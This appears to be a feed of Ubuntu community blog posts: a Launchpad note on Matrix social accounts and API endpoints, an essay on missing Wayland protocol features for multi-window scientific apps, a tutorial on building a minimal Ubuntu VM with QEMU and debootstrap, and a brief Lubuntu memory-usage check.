Adding a new Matrix account to your profile works similarly to how it has always worked for other accounts. Under the “Social Accounts” section in your user profile, you should now see a “No matrix accounts registered” message and an edit button that will lead you to the Matrix accounts edit page. To edit, remove, or add new ones, use the edit button shown in front of your newly added accounts in your profile.

We also added new API endpoints, Person.social_accounts and Person.getSocialAccountsByPlatform(), that will list the social accounts for a user. For more information, see our API documentation.
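
As a sketch of how these endpoints might be exercised over the Launchpad REST API (the ~example-user name is a placeholder, and the platform parameter name in the named operation is my assumption; consult the API documentation for the authoritative form):

```bash
# Fetch a user's profile entry and inspect the new social accounts data
curl -s "https://api.launchpad.net/devel/~example-user" | jq '.social_accounts'

# Named operations are invoked via ws.op; the 'platform' parameter
# name here is assumed, not confirmed
curl -s "https://api.launchpad.net/devel/~example-user?ws.op=getSocialAccountsByPlatform&platform=matrix"
```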

Currently, only Matrix was added as a social platform. But during this process, we made it much easier for Launchpad developers to add new social platforms to Launchpad in the future.

on January 22, 2024 04:30 PM

January 11, 2024

This post is in part a response to an aspect of Nate’s post “Does Wayland really break everything?”, but also my reflection on discussing Wayland protocol additions, a unique pleasure that I have been involved with for the past months[1].

Some facts

Before I start I want to make a few things clear: The Linux desktop will be moving to Wayland[2] – this is a fact at this point (and has been for a while), sticking to X11 makes no sense for future projects. From reading Wayland protocols and working with it at a much lower level than I ever wanted to, it is also very clear to me that Wayland is an exceptionally well-designed core protocol, and so are the additional extension protocols (xdg-shell & Co.). The modularity of Wayland is great, it gives it incredible flexibility and will for sure turn out to be good for the long-term viability of this project (and also provides a path to correct protocol issues in future, if one is found). In other words: Wayland is an amazing foundation to build on, and a lot of its design decisions make a lot of sense!

The shift towards people seeing “Linux” more as an application developer platform, and taking PipeWire and XDG Portals into account when designing for Wayland is also an amazing development and I love to see this – this holistic approach is something I always wanted!

Furthermore, I think Wayland removes a lot of functionality that shouldn’t exist in a modern compositor – and that’s a good thing too! Some of X11’s features and design decisions had clear drawbacks that we shouldn’t replicate. I highly recommend to read Nate’s blog post, it’s very good and goes into more detail. And due to all of this, I firmly believe that any advancement in the Wayland space must come from within the project.

But!

But! Of course there was a “but” coming 😉 – I think while developing Wayland-as-an-ecosystem we are now entrenched into narrow concepts of how a desktop should work. While discussing Wayland protocol additions, a lot of concepts clash, people from different desktops with different design philosophies debate the merits of those over and over again never reaching any conclusion (just as you will never get an answer out of humans whether sushi or pizza is the clearly superior food, or whether CSD or SSD is better). Some people want to use Wayland as a vehicle to force applications to submit to their desktop’s design philosophies, others prefer the smallest and leanest protocol possible, other developers want the most elegant behavior possible. To be clear, I think those are all very valid approaches.

But this also creates problems: By switching to Wayland compositors, we are already forcing a lot of porting work onto toolkit developers and application developers. This is annoying, but just work that has to be done. It becomes frustrating though if Wayland provides toolkits with absolutely no way to reach their goal in any reasonable way. For Nate’s Photoshop analogy: Of course Linux does not break Photoshop, it is Adobe’s responsibility to port it. But what if Linux was missing a crucial syscall that Photoshop needed for proper functionality and Adobe couldn’t port it without that? In that case it becomes much less clear on who is to blame for Photoshop not being available.

A lot of Wayland protocol work is focused on the environment and design, while applications and work to port them often is considered less. I think this happens because the overlap between application developers and developers of the desktop environments is not necessarily large, and the overlap with people willing to engage with Wayland upstream is even smaller. The combination of Windows developers porting apps to Linux and having involvement with toolkits or Wayland is pretty much nonexistent. So they have less of a voice.

A quick detour through the neuroscience research lab

I have been involved with Freedesktop, GNOME and KDE for an incredibly long time now (more than a decade), but my actual job (besides consulting for Purism) is that of a PhD candidate in a neuroscience research lab (working on the morphology of biological neurons and its relation to behavior). I am mostly involved with three research groups in our institute, which is about 35 people. Most of us do all our data analysis on powerful servers which we connect to using RDP (with KDE Plasma as desktop). Since I joined, I have been pushing the envelope a bit to extend Linux usage to data acquisition and regular clients, and to have our data acquisition hardware interface well with it. Linux brings some unique advantages for use in research, besides the obvious one of having every step of your data management platform introspectable with no black boxes left, a goal I value very highly in research (but this would be its own blogpost).

In terms of operating system usage though, most systems are still Windows-based. Windows is what companies develop for, and what people use by default and are familiar with. The choice of operating system is very strongly driven by application availability, and WSL being really good makes this somewhat worse, as it removes the need for people to switch to a real Linux system entirely if there is the occasional software requiring it. Yet, we have a lot more Linux users than before, and use it in many places where it makes sense. I also developed a novel data acquisition software that even runs on Linux-only and uses the abilities of the platform to its fullest extent. All of this resulted in me asking existing software and hardware vendors for Linux support a lot more often. Vendor-customer relationship in science is usually pretty good, and vendors do usually want to help out. Same for open source projects, especially if you offer to do Linux porting work for them… But overall, the ease of use and availability of required applications and their usability rules supreme. Most people are not technically knowledgeable and just want to get their research done in the best way possible, getting the best results with the least amount of friction.

KDE/Linux usage at a control station for a particle accelerator at Adlershof Technology Park, Germany, for reference (by 25 years of KDE)[3]

Back to the point

The point of that story is this: GNOME, KDE, RHEL, Debian or Ubuntu: They all do not matter if the necessary applications are not available for them. And as soon as they are, the easiest-to-use solution wins. There are many facets of “easiest”: In many cases this is RHEL due to Red Hat support contracts being available, in many other cases it is Ubuntu due to its mindshare and ease of use. KDE Plasma is also frequently seen, as it is perceived a bit easier to onboard Windows users with it (among other benefits). Ultimately, it comes down to applications and 3rd-party support though.

Here’s a dirty secret: In many cases, porting an application to Linux is not that difficult. The thing that companies (and FLOSS projects too!) struggle with and will calculate the merits of carefully in advance is whether it is worth the support cost as well as continuous QA/testing. Their staff will have to do all of that work, and they could spend that time on other tasks after all.

So if they learn that “porting to Linux” not only means added testing and support, but also means to choose between the legacy X11 display server that allows for 1:1 porting from Windows or the “new” Wayland compositors that do not support the same features they need, they will quickly consider it not worth the effort at all. I have seen this happen.

Of course many apps use a cross-platform toolkit like Qt, which greatly simplifies porting. But this just moves the issue one layer down, as now the toolkit needs to abstract Windows, macOS and Wayland. And Wayland does not contain features to do certain things or does them very differently from e.g. Windows, so toolkits have no way to actually implement the existing functionality in a way that works on all platforms. So in Qt’s documentation you will often find texts like “works everywhere except for on Wayland compositors or mobile”[4].

Many missing bits or altered behavior are just papercuts, but those add up. And if users will have a worse experience, this will translate to more support work, or people not wanting to use the software on the respective platform.

What’s missing?

Window positioning

SDI applications with multiple windows are very popular in the scientific world. For data acquisition (for example with microscopes) we often have one monitor with control elements and one larger one with the recorded image. There are also other configurations where multiple signal modalities are acquired, and the experimenter aligns windows exactly in the way they want and expects the layout to be stored and to be loaded upon reopening the application. Even in the image from Adlershof Technology Park above you can see this style of UI design, at mega-scale. Being able to pop out elements as windows from a single-window application to move them around freely is another frequently used paradigm, and immensely useful with these complex apps.

It is important to note that this is not a legacy design, but in many cases an intentional choice – these kinds of apps work incredibly well on larger screens or many screens and are very flexible (you can have any window configuration you want, and switch between them using the (usually) great window management abilities of your desktop).

Of course, these apps will work terribly on tablets and small form factors, but that is not the purpose they were designed for and nobody would use them that way.

I assumed for sure these features would be implemented at some point, but when it became clear that that would not happen, I created the ext-placement protocol which had some good discussion but was ultimately rejected from the xdg namespace. I then tried another solution based on feedback, which turned out not to work for most apps, and now proposed xdg-placement (v2) in an attempt to maybe still get some protocol done that we can agree on, exploring more options before pushing the existing protocol for inclusion into the ext Wayland protocol namespace. Meanwhile though, we can not port any application that needs this feature, while at the same time we are switching desktops and distributions to Wayland by default.

Window position restoration

Similarly, a protocol to save & restore window positions was already proposed in 2018, 6 years ago now, but it has still not been agreed upon, and may not even help multiwindow apps in its current form. The absence of this protocol means that applications can not restore their former window positions, and the user has to move them to their previous place again and again.

Meanwhile, toolkits can not adopt these protocols and applications can not use them and can not be ported to Wayland without introducing papercuts.

Window icons

Similarly, individual windows can not set their own icons, and not-installed applications can not have an icon at all because there is no desktop-entry file to load the icon from and no icon in the theme for them. You would think this is a niche issue, but for applications that create many windows, providing icons for them so the user can find them is fairly important. Of course it’s not the end of the world if every window has the same icon, but it’s one of those papercuts that make the software slightly less user-friendly. Even applications with fewer windows like LibrePCB are affected, so much so that they rather run their app through Xwayland for now.

I decided to address this after I was working on data analysis of image data in a Python virtualenv, where my code and the Python libraries used created lots of windows all with the default yellow “W” icon, making it impossible to distinguish them at a glance. This is xdg-toplevel-icon now, but of course it is an uphill battle where the very premise of needing this is questioned. So applications can not use it yet.

Limited window abilities requiring specialized protocols

Firefox has a picture-in-picture feature, allowing it to pop out media from a mediaplayer as separate floating window so the user can watch the media while doing other things. On X11 this is easily realized, but on Wayland the restrictions posed on windows necessitate a different solution. The xdg-pip protocol was proposed for this specialized usecase, but it is also not merged yet. So this feature does not work as well on Wayland.

Automated GUI testing / accessibility / automation

Automation of GUI tasks is a powerful feature, so is the ability to auto-test GUIs. This is being worked on, with libei and wlheadless-run (and stuff like ydotool exists too), but we’re not fully there yet.

Wayland is frustrating for (some) application authors

As you see, there are valid applications and valid usecases that can not be ported yet to Wayland with the same feature range they enjoyed on X11, Windows or macOS. So, from an application author’s perspective, Wayland does break things quite significantly, because things that worked before can no longer work and Wayland (the whole stack) does not provide any avenue to achieve the same result.

Wayland does “break” screen sharing, global hotkeys, gaming latency (via “no tearing”) etc, however for all of these there are solutions available that application authors can port to. And most developers will gladly do that work, especially since the newer APIs are usually a lot better and more robust. But if you give application authors no path forward except “use Xwayland and be on emulation as second-class citizen forever”, it just results in very frustrated application developers.

For some application developers, switching to a Wayland compositor is like buying a canvas from the Linux shop that forces your brush to only draw triangles. But maybe for your avant-garde art, you need to draw a circle. You can approximate one with triangles, but it will never be as good as the artwork of your friends who got their canvases from the Windows or macOS art supply shop and have more freedom to create their art.

Triangles are proven to be the best shape! If you are drawing circles you are creating bad art!

Wayland, via its protocol limitations, forces a certain way to build application UX – often for the better, but also sometimes to the detriment of users and applications. The protocols are often fairly opinionated, a result of the lessons learned from X11. In any case though, it is the odd one out – Windows and macOS do not pose the same limitations (for better or worse!), and the effort to port to Wayland is orders of magnitude bigger, or sometimes in case of the multiwindow UI paradigm impossible to achieve to the same level of polish. Desktop environments of course have a design philosophy that they want to push, and want applications to integrate as much as possible (same as macOS and Windows!). However, there are many applications out there, and pushing a design via protocol limitations will likely just result in fewer apps.

The porting dilemma

I spent probably way too much time looking into how to get applications cross-platform and running on Linux, often talking to vendors (FLOSS and proprietary) as well. Wayland limitations aren’t the biggest issue by far, but they do start to come up now, especially in the scientific space with Ubuntu having switched to Wayland by default. For application authors there is often no way to address these issues. Many scientists do not even understand why their Python script that creates some GUIs suddenly behaves weirdly because Qt is now using the Wayland backend on Ubuntu instead of X11. They do not know the difference and also do not want to deal with these details – even though they may be programmers as well, the real goal is not to fiddle with the display server, but to get to a scientific result somehow.

Another issue is portability layers like Wine which need to run Windows applications as-is on Wayland. Apparently Wine’s Wayland driver has some heuristics to make window positioning work (and I am amazed by the work done on this!), but that can only go so far.

A way out?

So, how would we actually solve this? Fundamentally, this excessively long blog post boils down to just one essential question:

Do we want to force applications to submit to a UX paradigm unconditionally, potentially losing out on application ports or keeping apps on X11 eternally, or do we want to throw them some rope to get as many applications ported over to Wayland, even though we might sacrifice some protocol purity?

I think we really have to answer that to make the discussions on wayland-protocols a lot less grueling. This question can be answered at the wayland-protocols level, but even more so it must be answered by the individual desktops and compositors.

If the answer for your environment turns out to be “Yes, we want the Wayland protocol to be more opinionated and will not make any compromises for application portability”, then your desktop/compositor should just immediately NACK protocols that add something like this and you simply shouldn’t engage in the discussion, as you reject the very premise of the new protocol: That it has any merit to exist and is needed in the first place. In this case contributors to Wayland and application authors also know where you stand, and a lot of debate is skipped. Of course, if application authors want to support your environment, you are basically asking them now to rewrite their UI, which they may or may not do. But at least they know what to expect and how to target your environment.

If the answer turns out to be “We do want some portability”, the next question obviously becomes where the line should be drawn and which changes are acceptable and which aren’t. We can’t blindly copy all X11 behavior, some porting work to Wayland is simply inevitable. Some written rules for that might be nice, but probably more importantly, if you agree fundamentally that there is an issue to be fixed, please engage in the discussions for the respective MRs! We for sure do not want to repeat X11 mistakes, and I am certain that we can implement protocols which provide the required functionality in a way that is a nice compromise in allowing applications a path forward into the Wayland future, while also being as good as possible and improving upon X11. For example, the toplevel-icon proposal is already a lot better than anything X11 ever had. Relaxing ACK requirements for the ext namespace is also a good proposed administrative change, as it allows some compositors to add features they want to support to the shared repository easier, while also not mandating them for others. In my opinion, it would allow for a lot less friction between the two different ideas of how Wayland protocol development should work. Some compositors could move forward and support more protocol extensions, while more restrictive compositors could support less things. Applications can detect supported protocols at launch and change their behavior accordingly (ideally even abstracted by toolkits).
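
Incidentally, you can inspect which globals (and therefore which protocol extensions) your own compositor advertises straight from a terminal, which is essentially what a toolkit does programmatically at startup; a quick check, assuming the wayland-utils package is installed:

```bash
# List the compositor's advertised globals, filtering for xdg
# extensions as an example
wayland-info | grep -i xdg
```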

You may now say that a lot of apps are ported, so surely this issue can not be that bad. And yes, what Wayland provides today may be enough for 80-90% of all apps. But what I hope the detour into the research lab has done is convince you that this smaller percentage of apps matters. A lot. And that it may be worthwhile to support them.

To end on a positive note: When it came to porting concrete apps over to Wayland, the only real showstoppers so far[5] were the missing window-positioning and window-position-restore features. I encountered them when porting my own software, and I got the issue as feedback from colleagues and fellow engineers. In second place was UI testing and automation support; the window-icon issue was mentioned twice, but being a cosmetic issue it likely simply hurts people less and they can ignore it more easily.

What this means is that the majority of apps are already fine, and many others are very, very close! A Wayland future for everyone is within our grasp! 😄

I will also bring my two protocol MRs to their conclusion for sure, because as application developers we need clarity on what the platform (either all desktops or even just a few) supports and will or will not support in future. And the only way to get something good done is by contribution and friendly discussion.

Footnotes

  1. Apologies for the clickbait-y title – it comes with the subject 😉
  2. When I talk about “Wayland” I mean the combined set of display server protocols and accepted protocol extensions, unless otherwise clarified.
  3. I would have picked a picture from our lab, but that would have needed permission first
  4. Qt has awesome “platform issues” pages, like for macOS and Linux/X11 which help with porting efforts, but Qt doesn’t even list Linux/Wayland as supported platform. There is some information though, like window geometry peculiarities, which aren’t particularly helpful when porting (but still essential to know).
  5. Besides issues with Nvidia hardware – CUDA for simulations and machine-learning is pretty much everywhere, so Nvidia cards are common, which causes trouble on Wayland still. It is improving though.
on January 11, 2024 04:24 PM

November 30, 2023

Every so often I have to make a new virtual machine for some specific use case. Perhaps I need a newer version of Ubuntu than the one I’m running on my hardware in order to build some software, and containerization just isn’t working. Or maybe I need to test an app that I made modifications to in a fresh environment. In these instances, it can be quite helpful to be able to spin up these virtual machines quickly, and only install the bare minimum software you need for your use case.

One common strategy when making a minimal or specially customized install is to use a server distro (like Ubuntu Server for instance) as the base and then install other things on top of it. This sorta works, but it’s less than ideal for a couple reasons:

  • Server distros are not the same as minimal distros. They may provide or offer software and configurations that are intended for a server use case. For instance, the ubuntu-server metapackage in Ubuntu depends on software intended for RAID array configuration and logical volume management, and it recommends software that enables LXD virtual machine related features. Chances are you don’t need or want these sort of things.

  • They can be time-consuming to set up. You have to go through the whole server install procedure, possibly having to configure or reconfigure things that are pointless for your use case, just to get the distro to install. Then you have to log in and customize it, adding an extra step.

If you’re able to use Debian as your distro, these problems aren’t so bad since Debian is sort of like Arch Linux - there’s a minimal base that you build on to turn it into a desktop or server. But for Ubuntu, there’s desktop images (not usually what you want), server images (not usually what you want), cloud images (might be usable but could be tricky), and Ubuntu Core images (definitely not what you want for most use cases). So how exactly do you make a minimal Ubuntu VM?

As hinted at above, a cloud image might work, but we’re going to use a different solution here. As it turns out, you don’t actually have to use a prebuilt image or installer to install Ubuntu. Similar to the installation procedure Arch Linux provides, you can install Ubuntu manually, giving you very good control over what goes into your VM and how it’s configured.

This guide is going to be focused on doing a manual installation of Ubuntu into a VM, using debootstrap to install the initial minimal system. You can use this same technique to install Ubuntu onto physical hardware by just booting from a live USB and then using this technique on your hardware’s physical disk(s). However we’re going to be primarily focused on using a VM right now. Also, the virtualization software we’re going to be working with is QEMU. If you’re using a different hypervisor like VMware, VirtualBox, or Hyper-V, you can make a new VM and then install Ubuntu manually into it the same way you would install Ubuntu onto physical hardware using this technique. QEMU, however, provides special tools that make this procedure easier, and QEMU is more flexible than other virtualization software in my experience. You can install it by running sudo apt install qemu-system-x86 on your host system.

With that laid out, let us begin.

Open a terminal on your physical machine, and make a directory for your new VM to reside in. I’ll use “~/VMs/Ubuntu” here.

mkdir ~/VMs/Ubuntu
cd ~/VMs/Ubuntu

Next, let’s make a virtual disk image for the VM using the qemu-img utility.

qemu-img create -f qcow2 ubuntu.img 32G

This will make a 32 GiB disk image - feel free to customize the size or filename as you see fit. The -f parameter at the beginning specifies the VM disk image format. QCOW2 is usually a good option since the image will start out small and then get bigger as necessary. However, if you’re already using a copy-on-write filesystem like BTRFS or ZFS, you might want to use -f raw rather than -f qcow2 - this will make a raw disk image file and avoid the overhead of the QCOW2 file format.
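
For the raw-image route mentioned above, the equivalent creation command is simply:

qemu-img create -f raw ubuntu.img 32G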

Now we need to attach the disk image to the host machine as a device. I usually do this with qemu-nbd, which can attach a QEMU-compatible disk image to your physical system as a network block device. These devices look and work just like physical disks, which makes them extremely handy for modifying the contents of a disk image.

qemu-nbd requires that the nbd kernel module be loaded, and at least on Ubuntu, it’s not loaded by default, so we need to load it before we can attach the disk image to our host machine.

sudo modprobe nbd
sudo qemu-nbd -f qcow2 -c /dev/nbd0 ./ubuntu.img

This will make our ubuntu.img file available through the /dev/nbd0 device. Make sure to specify the format via the -f switch, especially if you’re using a raw disk image. QEMU will keep you from writing a new partition table to the disk image if you give it a raw disk image without telling it directly that the disk image is raw.

Once your disk image is attached, we can partition it and format it just like a real disk. For simplicity’s sake, we’ll give the drive an MBR partition table, create a single partition enclosing all of the disk’s space, then format the partition as ext4.

sudo fdisk /dev/nbd0
n
p
1


w
sudo mkfs.ext4 /dev/nbd0p1

(The two blank lines are intentional - they just accept the default options for the partition’s first and last sector, which makes a partition that encloses all available space on the disk.)

Now we can mount the new partition.

mkdir vdisk
sudo mount /dev/nbd0p1 ./vdisk

Now it’s time to install the minimal Ubuntu system. You’ll need to know the first part of the codename for the Ubuntu version you intend to install. The codenames for Ubuntu releases are an adjective followed by the name of an animal, like “Jammy Jellyfish”. The first word (“Jammy” in this instance) is the one you need. These codenames are easy to look up online. Here’s the codenames for the currently supported LTS versions of Ubuntu, as well as the codename for the current development release:

+-------------------+-------+
| 20.04             | Focal |
+-------------------+-------+
| 22.04             | Jammy |
+-------------------+-------+
| 24.04 Development | Noble |
+-------------------+-------+

To install the initial minimal Ubuntu system, we’ll use the debootstrap utility. This utility will download and install the bare minimum packages needed to have a functional Ubuntu system. Keep in mind that the Ubuntu installation this tool makes is really minimal - it doesn’t even come with a bootloader or Linux kernel. We’ll need to make quite a few changes to this installation before it’s ready for use in a VM.

Assuming we’re installing Ubuntu 22.04 LTS into our VM, the command to use is:

sudo debootstrap jammy ./vdisk

After a few minutes, our new system should be downloaded and installed. (Note that debootstrap does require root privileges.)
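
debootstrap also accepts an optional mirror argument after the target directory, which can be handy if you want to pull packages from a country mirror or a local cache; for example:

sudo debootstrap jammy ./vdisk http://archive.ubuntu.com/ubuntu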

Now we’re ready to customize the VM! To do this, we’ll use a utility called chroot - this utility allows us to “enter” an installed Linux system, so we can modify it without having to boot it. (This is done by changing the root directory (from the perspective of the chroot process) to whatever directory you specify, then launching a shell or program inside the specified directory. The shell or program will see its root directory as being the directory you specified, and voila, it’s as if we’re “inside” the installed system without having to boot it. This is a very weak form of containerization and shouldn’t be relied on for security, but it’s perfect for what we’re doing.)

There’s one thing we have to account for before chrooting into our new Ubuntu installation. Some commands we need to run will assume that certain special directories are mounted properly - in particular, /proc should point to a procfs filesystem, /sys should point to a sysfs filesystem, /dev needs to contain all of the device files of our system, and /dev/pts needs to contain the device files for pseudoterminals (you don’t have to know what any of that means, just know that those four directories are important and have to be set up properly). If these directories are not properly mounted, some tools will behave strangely or not work at all. The easiest way to solve this problem is with bind mounts. These basically tell Linux to make the contents of one directory visible in some other directory too. (These are sort of like symlinks, but they work differently - a symlink says “I’m a link to something, go over here to see what I contain”, whereas a bind mount says “make this directory’s contents visible over here too”. The differences are subtle but important - a symlink can’t make files outside of a chroot visible inside the chroot. A bind mount, however, can.)

So let’s bind mount the needed directories from our system into the chroot:

sudo mount --bind /dev ./vdisk/dev
sudo mount --bind /proc ./vdisk/proc
sudo mount --bind /sys ./vdisk/sys
sudo mount --bind /dev/pts ./vdisk/dev/pts

And now we can chroot in!

sudo chroot ./vdisk

Run ping -c1 8.8.8.8 just to make sure that Internet access is working - if it’s not, you may need to copy the host’s /etc/resolv.conf file into the VM. However, you probably won’t have to do this. Assuming Internet is working, we can now start customizing things.

By default, debootstrap only enables the “main” repository of Ubuntu. This repository only contains free-and-open-source software that is supported by Canonical. This does *not* include most of the software available in Ubuntu - most of it is in the “universe”, “restricted”, and “multiverse” repositories. If you really know what you’re doing, you can leave some of these repositories out, but I would highly recommend you enable them. Also, only the “release” pocket is enabled by default - this pocket includes all of the software that came with your chosen version of Ubuntu when it was first released, but it doesn’t include bug fixes, security updates, or newer versions of software. All those are in the “updates”, “security”, and “backports” pockets.

To fix this, run the following block of code, adjusted for your release of Ubuntu:

tee /etc/apt/sources.list << ENDSOURCESLIST
deb http://archive.ubuntu.com/ubuntu jammy main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-updates main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-security main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-backports main universe restricted multiverse
ENDSOURCESLIST

Replace “jammy” with the codename corresponding to your chosen release of Ubuntu. Once you’ve run this, run cat /etc/apt/sources.list to make sure the file looks right, then run apt update to refresh your software database with the newly enabled repositories. Once that’s done, run apt full-upgrade to update any software in the base installation that’s out-of-date.

What exactly you install at this point is up to you, but here’s my list of recommendations:

  • linux-generic. Highly recommended. This provides the Linux kernel. Without it, you’re going to have significant trouble booting. You can replace this with a different kernel metapackage if you want to for some reason (like linux-lowlatency).

  • grub-pc. Highly recommended. This is the bootloader. You might be able to replace this with an alternative bootloader like systemd-boot.

  • vim (or some other decent text editor that runs in a terminal). Highly recommended. The minimal install of Ubuntu doesn’t come with a good text editor, and you’ll really want one of those most likely.

  • network-manager. Highly recommended. If you don’t install this or some other network manager, you won’t have Internet access. You can replace this with an alternative network manager if you’d like.

  • tmux. Recommended. Unless you’re going to install a graphical environment, you’ll probably want a terminal multiplexer so you don’t have to juggle TTYs (which is especially painful in QEMU).

  • openssh-server. Optional. This is handy since it lets you use your terminal emulator of choice on your physical machine to interface with the virtual machine. You won’t be stuck using a rather clumsy and slow TTY in a QEMU display.

  • pulseaudio. Very optional. Provides sound support within the VM.

  • icewm + xserver-xorg + xinit + xterm. Very optional. If you need or want a graphical environment, this should provide you with a fairly minimal and fast one. You’ll still log in at a TTY, but you can use startx to start a desktop.

Add whatever software you want to this list, remove whatever you don’t want, and then install it all with this command:

apt install listOfPackages

Replace “listOfPackages” with the actual list of packages you want to install. For instance, if I were to install everything in the above list except openssh-server, I would use:

apt install linux-generic grub-pc vim network-manager tmux icewm xserver-xorg xinit xterm

At this point our software is installed, but the VM still has a few things needed to get it going.

  • We need to install and configure the bootloader.

  • We need an /etc/fstab file, or the system will boot with the drive mounted read-only.

  • We should probably make a non-root user with sudo access.

  • There’s a file in Ubuntu that will prevent Internet access from working. We should delete it now.

The bootloader is pretty easy to install and configure. Just run:

sudo grub-install /dev/nbd0
sudo update-grub

For /etc/fstab, there are a few options. One particularly good one is to label the partition we installed Ubuntu into using e2label, then use that label as the ID of the drive we want to mount as root. That can be done like this:

e2label /dev/nbd0p1 ubuntu-inst
echo "LABEL=ubuntu-inst / ext4 defaults 0 1" > /etc/fstab

Making a user account is fairly easy:

adduser user # follow the prompts to create the user
adduser user sudo

And lastly, we should remove the Internet blocker file. I don’t understand why exactly this file exists in Ubuntu, but it does, and it causes problems for me when I make a minimal VM in this way. Removing it fixes the problem.

rm /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf

EDIT: January 21, 2024: This rm command doesn’t actually work forever - an update to NetworkManager can end up putting this file back, breaking networking again. Rather than using rm on it, you should dpkg-divert it somewhere benign, for instance with dpkg-divert --divert /var/nm-globally-managed-devices-junk.old --rename /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf, which should persist even after an update.

And that’s it! Now we can exit the chroot, unmount everything, and detach the disk image from our host machine.

exit
sudo umount ./vdisk/dev/pts
sudo umount ./vdisk/dev
sudo umount ./vdisk/proc
sudo umount ./vdisk/sys
sudo umount ./vdisk
sudo qemu-nbd -d /dev/nbd0

Now we can try and boot the VM. But before doing that, it’s probably a good idea to make a VM launcher script. Run vim ./startVM.sh (replacing “vim” with your text editor of choice), then type the following contents into the file:

#!/bin/bash
qemu-system-x86_64 -enable-kvm -machine q35 -m 4G -smp 2 -vga qxl -display sdl -monitor stdio -device intel-hda -device hda-duplex -usb -device usb-tablet -drive file=./ubuntu.img,format=qcow2,if=virtio

Refer to the qemu-system-x86_64 manpage or QEMU Invocation documentation page at https://www.qemu.org/docs/master/system/invocation.html for more info on what all these options do. Basically this gives you a VM with 4 GB RAM, 2 CPU cores, decent graphics (not 3d accelerated but not as bad as plain VGA), and audio support. You can tweak the amount of RAM and number of CPU cores by changing the -m and -smp parameters respectively. You’ll have access to the QEMU monitor through whatever terminal you run the launcher script in, allowing you to do things like switch to a different TTY, insert and remove devices and storage media on the fly, and things like that.

Finally, it’s time to see if it works.

chmod +x ./startVM.sh
./startVM.sh

If all goes well, the VM should boot and you should be able to log in! If you installed IceWM and its accompanying software like mentioned earlier, try running startx once you log in. This should pop open a functional IceWM desktop.

Some other things you should test once you’re logged in:

  • Do you have Internet access? ping -c1 8.8.8.8 can be used to test. If you don’t have Internet, run sudo nmtui in a terminal and add a new Ethernet network within the VM, then try activating it. If you get an error about the Ethernet device being strictly unmanaged, you probably forgot to remove the /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf file mentioned earlier.

  • Can you write anything to the drive? Try running touch test to make sure. If you can’t, you probably forgot to create the /etc/fstab file.

If either of these things don’t work, you can power off the VM, then re-attach the VM’s virtual disk to your host machine, mount it, and chroot in like this:

sudo qemu-nbd -f qcow2 -c /dev/nbd0 ./ubuntu.img
sudo mount /dev/nbd0p1 ./vdisk
sudo chroot vdisk

Since all you’ll be doing is writing or removing a file, you don’t need to bind mount all the special directories we had to work with earlier.

Once you’re done fixing whatever is wrong, you can exit the VM, unmount and detach its disk, and then try to boot it again like this:

exit
sudo umount vdisk
sudo qemu-nbd -d /dev/nbd0
./startVM.sh

You now have a fully functional, minimal VM! Some extra tips that you may find handy:

  • If you choose to install an SSH server into your VM, you can use the “hostfwd” setting in QEMU to forward a port on your local machine to port 22 within the VM. This will allow you to SSH into the VM. Add a parameter like -nic user,hostfwd=tcp:127.0.0.1:2222-:22 to your QEMU command in the “startVM.sh” script. This will forward port 2222 of your host machine to port 22 of the VM. Then you can SSH into the VM by running ssh user@127.0.0.1 -p 2222. The “hostfwd” QEMU feature is documented at https://www.qemu.org/docs/master/system/invocation.html - just search the page for “hostfwd” to find it.

  • If you intend to use the VM through SSH only and don’t want a QEMU window at all, remove the following three parameters from the QEMU command in “startVM.sh”:

    • -vga qxl

    • -display sdl

    • -monitor stdio

    Then add the following switch:

    • -nographic

    This will disable the graphical QEMU window entirely and provide no video hardware to the VM.

  • You can disable sound support by removing the following switches from the QEMU command in “startVM.sh”:

    • -device intel-hda

    • -device hda-duplex
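
Putting the SSH and headless tips together, a hypothetical headless variant of “startVM.sh” (using the example port 2222 forwarding from above, with sound removed) might look like this:

#!/bin/bash
# Headless VM: the serial console and QEMU monitor are multiplexed on stdio,
# and host port 2222 is forwarded to the VM's SSH port 22.
qemu-system-x86_64 -enable-kvm -machine q35 -m 4G -smp 2 \
  -nographic \
  -nic user,hostfwd=tcp:127.0.0.1:2222-:22 \
  -drive file=./ubuntu.img,format=qcow2,if=virtio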

There’s lots more you can do with QEMU and manual Ubuntu installations like this, but I think this should give you a good start. Hope you find this useful! God bless.


on November 30, 2023 10:34 PM

November 25, 2023

In 2020 I reviewed LiveCD memory usage.

I was hoping to review either Wayland-only or immutable-only distros (think ostree/flatpak/snaps, etc.), but for various reasons, on my setup that would have turned into just a GNOME comparison, and that's not as interesting. There are just too many distros/variants for me to do a full follow-up.

Lubuntu has previously always been the winner, so let's just see how Lubuntu 23.10 is doing today.

Previously, in 2020, Lubuntu needed 585 MB of RAM to be able to run anything from the live CD. With a fresh install today, Lubuntu can still launch QTerminal with just 540 MB of RAM (not apples to apples, but still)! And that's without the zram it had last time.

I decided to try removing some parts of the base system to see the cost of each component (to roughly 10 MB accuracy); a sketch of the approach follows the list below. I disabled networking to try to make it a fairer comparison.

  • Snapd - 30 MiB
  • Printing - cups foomatic - 10 MiB
  • rsyslog/crons - 10 MiB
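
The exact removal commands aren't shown above; a rough approximation, assuming the usual Ubuntu package names, would be:

# Remove each component in turn, reboot, and compare memory usage
sudo apt purge snapd               # snap daemon
sudo apt purge cups foomatic-db    # printing stack (package names assumed)
sudo apt purge rsyslog cron        # syslog and cron daemons
free -m                            # check 'used' on the next fresh boot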

Rsyslog impact

Of the three above, rsyslog (and cron) feel the most redundant on a modern Linux system with systemd. So I tried hammering the logging system to see if I could cause a slowdown, by having a service echo lots of gibberish every 0.1 seconds.
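
One way to reproduce such a log-spam service is a transient systemd unit along these lines (a sketch; the unit name and message format are made up):

# Spawn a transient service that logs random text every 0.1 seconds
sudo systemd-run --unit=gibberish sh -c \
  'while true; do echo "gibberish: $(head -c 64 /dev/urandom | base64)"; sleep 0.1; done'

Stop it afterwards with sudo systemctl stop gibberish.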

After an hour of uptime, this is how much space was used:

  • syslog 575M
  • journal at 1008M

CPU usage on a fresh boot afterwards:

With Rsyslog

  • gibberish service was at 1% CPU usage
  • rsyslog was at 2-3%
  • journal was at ~4%

Without Rsyslog

  • gibberish service was at 1% CPU usage
  • journal was at 1-3%

That's a pretty extreme case, but it does show some impact from rsyslog, which in most desktop settings is redundant anyway.

Testing notes:

